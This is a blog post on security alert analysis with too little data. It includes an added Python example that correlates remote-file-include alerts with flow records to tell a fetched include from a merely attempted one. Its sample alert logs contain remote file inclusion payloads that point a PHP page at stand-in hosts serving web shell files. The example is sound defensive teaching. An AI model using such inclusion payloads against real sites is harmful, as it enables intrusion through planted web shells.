work and IT @ 03 Dec 2006 08:43 am by ayoi
Hehehe, this topic is not about those who work days and nights at hazardous places. It is mainly about my team working days and nights doing our work with too few resources to do our analysis properly.
As I've learnt, to do a proper analysis on certain alerts/incidents/events, we should analyze (if available) full content data (probably kind of hard for large-scale, high-bandwidth, limited-storage networks), session data, statistical data (better network traffic statistics than alert statistics, I presume) and alert data. Currently all we have is alert data, even for incident investigation/analysis. But the client's report requests are sometimes beyond what we can provide. Just imagine what it would be like when an incident like this happens.
As I'm going to leave this place by the end of this year, perhaps I should leave some guide for my teammates on how to provide/do "analysis" on certain events/incidents, starting with the remote include path alert.
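As an added illustration of the point about data types (this is example code written for this page, not the author's or the team's own tooling), the script below takes a remote include path alert and shows what alert data alone can and cannot answer. Alert data says a request carried a remote URL in a query parameter; only session (flow) data can show whether the web server then connected out to that host, i.e. whether the include was actually fetched. The alert and session records, the log formats, the 30-second correlation window and the hosts are all constructed for the example.

```python
"""
Correlating a 'remote include path' web alert with session (flow) data.

All records below are constructed for this example; the log formats are
invented, not those of any particular sensor.
"""
import ipaddress
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Constructed alert records: the sensor logged the request URI with each alert.
ALERT_LOG = """\
2006-12-03 08:41:12.104 203.0.113.45 -> 192.0.2.10:80 WEB-PHP remote include path GET /index.php?page=http://203.0.113.45/shell.txt?
2006-12-03 08:43:05.880 198.51.100.7 -> 192.0.2.10:80 WEB-PHP remote include path GET /login.php?return=http%3A%2F%2Fwww.example.com%2Fhome
2006-12-03 08:45:30.017 203.0.113.45 -> 192.0.2.10:80 WEB-PHP remote include path GET /index.php?page=http://198.51.100.200/c99.txt?
"""

# Constructed session records, one per flow: start time, proto, src:port -> dst:port, bytes.
# The second flow is the web server (192.0.2.10) connecting back to 203.0.113.45.
SESSION_LOG = """\
2006-12-03 08:41:12.101 tcp 203.0.113.45:51234 -> 192.0.2.10:80 bytes=612
2006-12-03 08:41:12.377 tcp 192.0.2.10:43210 -> 203.0.113.45:80 bytes=1834
2006-12-03 08:43:05.870 tcp 198.51.100.7:60011 -> 192.0.2.10:80 bytes=540
2006-12-03 08:45:30.010 tcp 203.0.113.45:51290 -> 192.0.2.10:80 bytes=498
"""

ALERT_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<src>\S+) -> (?P<dst>[^:]+):(?P<dport>\d+) "
    r"(?P<sig>.+?) (?P<method>GET|POST) (?P<uri>\S+)$"
)
SESSION_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<proto>\w+) (?P<src>[^:]+):(?P<sport>\d+) -> "
    r"(?P<dst>[^:]+):(?P<dport>\d+) bytes=(?P<bytes>\d+)$"
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


@dataclass
class Alert:
    ts: datetime
    src: str
    dst: str
    uri: str


@dataclass
class Session:
    ts: datetime
    src: str
    dst: str
    dport: int


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def parse_alerts(text: str) -> list[Alert]:
    out = []
    for line in text.splitlines():
        m = ALERT_RE.match(line)
        if m:
            out.append(Alert(_ts(m["ts"]), m["src"], m["dst"], m["uri"]))
    return out


def parse_sessions(text: str) -> list[Session]:
    out = []
    for line in text.splitlines():
        m = SESSION_RE.match(line)
        if m:
            out.append(Session(_ts(m["ts"]), m["src"], m["dst"], int(m["dport"])))
    return out


def remote_include_hosts(uri: str) -> list[tuple[str, str]]:
    """(parameter, host) for every query value that is a remote URL.
    parse_qs decodes %-encoding, so http%3A%2F%2F... is caught too."""
    hits = []
    for name, values in parse_qs(urlsplit(uri).query).items():
        for v in values:
            if v.lower().startswith(REMOTE_SCHEMES):
                host = urlsplit(v).hostname
                if host:
                    hits.append((name, host))
    return hits


def correlate(alert: Alert, sessions: list[Session],
              window: timedelta = timedelta(seconds=30)) -> list[tuple[str, str, str]]:
    """Decide per remote URL whether the server fetched it, only attempted it,
    or whether flow data cannot say (hostname in URL, flows keyed by IP)."""
    findings = []
    for param, host in remote_include_hosts(alert.uri):
        try:
            ipaddress.ip_address(host)
        except ValueError:
            # Would need DNS logs or full content to tie a hostname to a flow.
            findings.append((param, host, "needs-dns"))
            continue
        outbound = [s for s in sessions
                    if s.src == alert.dst and s.dst == host
                    and alert.ts <= s.ts <= alert.ts + window]
        findings.append((param, host, "fetched" if outbound else "attempted"))
    return findings


def analyse(alert_text: str, session_text: str) -> list[tuple[str, list]]:
    sessions = parse_sessions(session_text)
    return [(a.src, correlate(a, sessions)) for a in parse_alerts(alert_text)]


if __name__ == "__main__":
    for src, findings in analyse(ALERT_LOG, SESSION_LOG):
        print(src, findings)
```

The first alert becomes "fetched" only because the session data shows 192.0.2.10 opening a connection back to 203.0.113.45 right after the request; with alert data alone all three would look identical. The second shows the limit of flow data: a hostname in the URL cannot be matched to IP flows without DNS or full content, and a redirect parameter like that is also a likely false positive worth checking before reporting.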
p/s : OK, I know I am the one who furiously rubbished the request to write an SOP for alert analysis. (There are thousands of them, and how the hell can I do that?) But this is different. I'm doing it one at a time and I can take my own sweet time. Maybe one day I should rename my blog to tataosecurity. tatao = tatau = tak tau (Malay for "don't know").